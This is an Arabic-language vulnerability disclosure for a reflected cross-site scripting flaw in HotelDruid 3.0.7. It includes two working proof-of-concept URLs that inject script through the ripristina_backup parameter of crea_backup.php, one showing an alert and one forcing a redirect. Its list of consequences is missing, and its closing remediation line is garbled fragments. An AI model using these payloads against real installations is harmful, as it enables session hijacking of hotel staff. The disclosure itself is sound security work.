
# إثبات مفهوم لثغرة XSS المنعكسة في HotelDruid 3.0.7 إثبات مفهوم لثغرة البرمجة النصية عبر المواقع (XSS) المنعكسة في HotelDruid 3.0.7، يوضح تنفيذ JavaScript عشوائي عبر معامل ripristina_backup في crea_backup.php.
ثغرة برمجة نصية عبر المواقع (Cross Site Scripting) في DigitalDruid HotelDruid الإصدار 3.0.7 تسمح للمهاجم بتنفيذ كود عشوائي والحصول على معلومات حساسة عبر معامل ripristina_backup في نقطة النهاية crea_backup.php
يمكن للمهاجم خداع مستخدم موثّق لزيارة عنوان URL مصمم بعناية، مما يؤدي إلى تشغيل JavaScript خبيث في متصفحه. وتشمل العواقب المحتملة:
http://localhost/hoteldruid/crea_backup.php?anno=2025&id_sessione=<valid_session_id>&azione=SI&ripristina_backup=%22%3E%3CscrIpt%3Ealert%28%27Huy%20Vo%20Found%20This%20Vulnerability%27%29%3B%3C%2FscrIpt%3E&dati_conn=attuali&mantieni_anni=1
النتيجة: تؤكد رسالة منبثقة تحمل النص “Huy Vo Found This Vulnerability” نجاح تنفيذ XSS.
http://localhost/hoteldruid/crea_backup.php?anno=2025&id_sessione=<valid_session_id>&azione=SI&ripristina_backup="><scrIpt>window.location.href='https://www.facebook.com';</scrIpt>&dati_conn=attuali&mantieni_anni=1
النتيجة: يقوم المتصفح تلقائيًا بإعادة التوجيه إلى Facebook.
HotelDruid هو نظام مفتوح المصدر لإدارة الممتلكات يُستخدم لإدارة الحجوزات والغرف والفواتير في الفنادق ودور الضيافة وغيرها من أعمال الضيافة. وهو قائم على الويب، ويُثبَّت عادةً على خوادم محلية ويُوصَل إليه عبر المتصفح. ونظرًا لواجهة الويب وطبيعته الإدارية، يُعد الأمان القوي أمرًا بالغ الأهمية — خاصةً للوظائف الموثّقة.
تعالج نقطة النهاية crea_backup.php المعامل ripristina_backup دون تنظيف أو ترميز، مما يعكس إدخال المستخدم مباشرةً في الصفحة. وهذا يسمح للمهاجم بصياغة عنوان URL خبيث يحقن JavaScript عشوائيًا في الصفحة المعروضة لمستخدم موثّق.
ripristina_backupcrea_backup.phpid_sessione)ripristina_backup.htmlspecialchars() في PHP لترميز أحرف < و >).